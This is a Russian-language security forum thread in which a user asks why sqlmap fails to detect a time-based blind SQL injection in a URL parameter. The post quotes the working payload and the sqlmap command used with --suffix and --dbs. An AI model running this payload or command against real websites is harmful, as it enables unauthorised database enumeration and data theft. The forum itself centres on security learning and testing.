• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Sqlmap не видит уязвимость.

Emince

Emince

Green Team
18.02.2019
8
0
Доброго времени суток!
Есть уязвимость в param1 https://site/index.php?param1=1&param2=1&param3=0&param4=es&param5=1, payload выглядит так 0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z . Sqlmap, в упор, не видит уязвимость в param1.
Пытался передать этот payload в sqlmap вот так sqlmap.py -p param1 -u "https://site/index.php?param1=1&param2=1&param3=0&param4=es&param5=1 --dbs --random-agent --batch --suffix "0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z" , ничего не вышло.
Прошу подсказать, как корректно передать указанный payload в sqlmap?
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

W
  • Вопрос Вопрос
SQLmap не видит уязвимость
Ответы
5
Просмотры
2 тыс.
Вопросы и Ответы по ИБ (Q&A)
Местный
М
G
  • Вопрос Вопрос
Как просканировать сайт на слепые уязвимости?
Ответы
0
Просмотры
1 тыс.
Вопросы и Ответы по ИБ (Q&A)
guest-1675977874
G
ArsenalWest
  • Вопрос Вопрос
Sqlmap название бд
Ответы
0
Просмотры
2 тыс.
Вопросы и Ответы по ИБ (Q&A)
ArsenalWest
ArsenalWest
clevergod
CTF Врайтап Pentestit Lab 12 - для начинающих (часть 1)
Ответы
33
Просмотры
26 тыс.
CTF-соревнования и write-ups – Hackerlab, HTB, THM
gmontekrissto
gmontekrissto
Верх Низ